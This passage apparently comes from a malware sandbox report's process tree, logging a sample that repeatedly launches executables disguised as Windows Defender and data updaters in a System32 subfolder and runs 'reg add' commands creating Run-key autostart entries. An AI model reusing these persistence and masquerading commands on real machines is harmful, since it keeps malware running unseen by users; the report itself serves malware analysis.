        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        31⤵
        
        PID:1144
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        31⤵
        
        PID:952
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        31⤵
        
        PID:2740
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        32⤵
        
        PID:2216
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        31⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1636
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        31⤵
        
        PID:1616
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AF9.tmp\AFA.tmp\AFB.bat C:\Windows\system32\java.exe"
        32⤵
        Drops file in System32 directory
        
        PID:3000
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        33⤵
        Delays execution with timeout.exe
        
        PID:1300
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        33⤵
        
        PID:2128
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        33⤵
        Adds Run key to start application
        
        PID:1560
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        33⤵
        
        PID:2744
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        33⤵
        
        PID:2728
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        33⤵
        
        PID:1716
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        34⤵
        
        PID:1772
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        33⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2628
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        33⤵
        
        PID:1948
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E91.tmp\E92.tmp\E93.bat C:\Windows\system32\java.exe"
        34⤵
        Drops file in System32 directory
        
        PID:588
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        35⤵
        
        PID:2932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        35⤵
        
        PID:2880
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        35⤵
        
        PID:3032
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        35⤵
        
        PID:928
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        35⤵
        Adds Run key to start application
        
        PID:2552
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        35⤵
        
        PID:2496
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        36⤵
        
        PID:2036
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        35⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        35⤵
        
        PID:1932
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1297.tmp\1298.tmp\1299.bat C:\Windows\system32\java.exe"
        36⤵
        Drops file in System32 directory
        
        PID:1580
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        37⤵
        
        PID:764
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        37⤵
        
        PID:2388
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        37⤵
        
        PID:932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        37⤵
        
        PID:2116
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        37⤵
        
        PID:848
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        37⤵
        
        PID:2628
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        38⤵
        
        PID:3068
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        37⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2492
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        37⤵
        
        PID:2932
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\162F.tmp\1630.tmp\1631.bat C:\Windows\system32\java.exe"
        38⤵
        Drops file in System32 directory
        
        PID:2728
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        39⤵
        
        PID:992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        39⤵
        
        PID:1912
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        39⤵
        
        PID:892
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        39⤵
        
        PID:2292
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        39⤵
        
        PID:1260
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        39⤵
        
        PID:2600
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        40⤵
        
        PID:684
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        39⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2556
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        39⤵
        
        PID:3036
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1A25.tmp\1A26.tmp\1A27.bat C:\Windows\system32\java.exe"
        40⤵
        
        PID:1848
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        41⤵
        
        PID:1360
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        41⤵
        
        PID:1912
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        41⤵
        Adds Run key to start application
        
        PID:1976
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        41⤵
        
        PID:892
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        41⤵
        
        PID:2376
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        41⤵
        
        PID:1252
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        42⤵
        
        PID:2136
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        41⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        41⤵
        
        PID:1260
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1E1B.tmp\1E1C.tmp\1E1D.bat C:\Windows\system32\java.exe"
        42⤵
        Drops file in System32 directory
        
        PID:2776
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        43⤵
        Delays execution with timeout.exe
        
        PID:336
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        43⤵
        
        PID:912
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        43⤵
        
        PID:764
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        43⤵
        
        PID:2864
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        43⤵
        
        PID:2904
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        43⤵
        
        PID:2484
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        44⤵
        
        PID:808
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        43⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:900
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        43⤵
        
        PID:3060
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2221.tmp\2222.tmp\2223.bat C:\Windows\system32\java.exe"
        44⤵
        Drops file in System32 directory
        
        PID:1224
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        45⤵
        Delays execution with timeout.exe
        
        PID:1912
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        45⤵
        Adds Run key to start application
        
        PID:1644
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        45⤵
        
        PID:2864
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        45⤵
        Adds Run key to start application
        
        PID:2904
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        45⤵
        Adds Run key to start application
        
        PID:2720
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        45⤵
        
        PID:3000
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        46⤵
        
        PID:2940
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        45⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        45⤵
        
        PID:1356
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\25F8.tmp\25F9.tmp\25FA.bat C:\Windows\system32\java.exe"
        46⤵
        Drops file in System32 directory
        
        PID:1416
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        47⤵
        Delays execution with timeout.exe
        
        PID:2908
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        47⤵
        
        PID:764
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        47⤵
        
        PID:1672
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        47⤵
        
        PID:2696
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        47⤵
        Adds Run key to start application
        
        PID:2056
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        47⤵
        
        PID:1440
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        48⤵
        
        PID:2792
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        47⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1512
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        47⤵
        
        PID:1912
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\29EE.tmp\29EF.tmp\29F0.bat C:\Windows\system32\java.exe"
        48⤵
        Drops file in System32 directory
        
        PID:1980
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        49⤵
        
        PID:1700
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        49⤵
        Adds Run key to start application
        
        PID:2044
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        49⤵
        
        PID:2544
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        49⤵
        
        PID:2184
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        49⤵
        
        PID:2784
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        49⤵
        
        PID:1580
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        50⤵
        
        PID:528
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        49⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1932
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        49⤵
        
        PID:2308
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2DD4.tmp\2DD5.tmp\2DD6.bat C:\Windows\system32\java.exe"
        50⤵
        Drops file in System32 directory
        
        PID:1444
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        51⤵
        
        PID:2932
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        51⤵
        
        PID:2760
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        51⤵
        
        PID:1048
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        51⤵
        
        PID:1324
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        51⤵
        
        PID:2584
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        51⤵
        
        PID:1616
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        52⤵
        
        PID:1788
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        51⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1536
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        51⤵
        
        PID:2244
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\31DA.tmp\31DB.tmp\31DC.bat C:\Windows\system32\java.exe"
        52⤵
        Drops file in System32 directory
        
        PID:3064
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        53⤵
        Delays execution with timeout.exe
        
        PID:2084
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        53⤵
        
        PID:444
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        53⤵
        
        PID:2544
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        53⤵
        
        PID:2564
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        53⤵
        Adds Run key to start application
        
        PID:2044
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        53⤵
        
        PID:1892
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        54⤵
        
        PID:588
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        53⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:700
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        53⤵
        
        PID:2784
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3582.tmp\3583.tmp\3584.bat C:\Windows\system32\java.exe"
        54⤵
        Drops file in System32 directory
        
        PID:2580
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        55⤵
        
        PID:1260
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        55⤵
        
        PID:1560
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        55⤵
        Adds Run key to start application
        
        PID:1196
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        55⤵
        
        PID:1700
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        55⤵
        
        PID:2608
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        55⤵
        
        PID:2824
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        56⤵
        
        PID:3236
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        55⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2932
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        55⤵
        
        PID:1536
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3949.tmp\394A.tmp\394B.bat C:\Windows\system32\java.exe"
        56⤵
        
        PID:3256
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        57⤵
        Delays execution with timeout.exe
        
        PID:3288
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        57⤵
        Adds Run key to start application
        
        PID:3320
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        57⤵
        
        PID:3328
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        57⤵
        
        PID:3336
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        57⤵
        
        PID:3344
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        57⤵
        
        PID:3352
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        58⤵
        
        PID:3656
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        57⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3360
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        57⤵
        
        PID:3368
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3D5E.tmp\3D5F.tmp\3D60.bat C:\Windows\system32\java.exe"
        58⤵
        Drops file in System32 directory
        
        PID:3680
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        59⤵
        Delays execution with timeout.exe
        
        PID:3704
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        59⤵
        
        PID:3736
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        59⤵
        
        PID:3744
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        59⤵
        
        PID:3752
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        59⤵
        Adds Run key to start application
        
        PID:3760
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        59⤵
        
        PID:3768
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        60⤵
        
        PID:2376
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        59⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3776
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        59⤵
        
        PID:3784
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4183.tmp\4184.tmp\4185.bat C:\Windows\system32\java.exe"
        60⤵
        Drops file in System32 directory
        
        PID:3988
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        61⤵
        
        PID:4068
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        61⤵
        
        PID:1572
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        61⤵
        
        PID:3244
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        61⤵
        
        PID:3252
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        61⤵
        
        PID:2908
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        61⤵
        
        PID:700
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        62⤵
        
        PID:3408
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        61⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3004
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        61⤵
        
        PID:2232
        
        C:\Windows\system32\cmd.exe
        
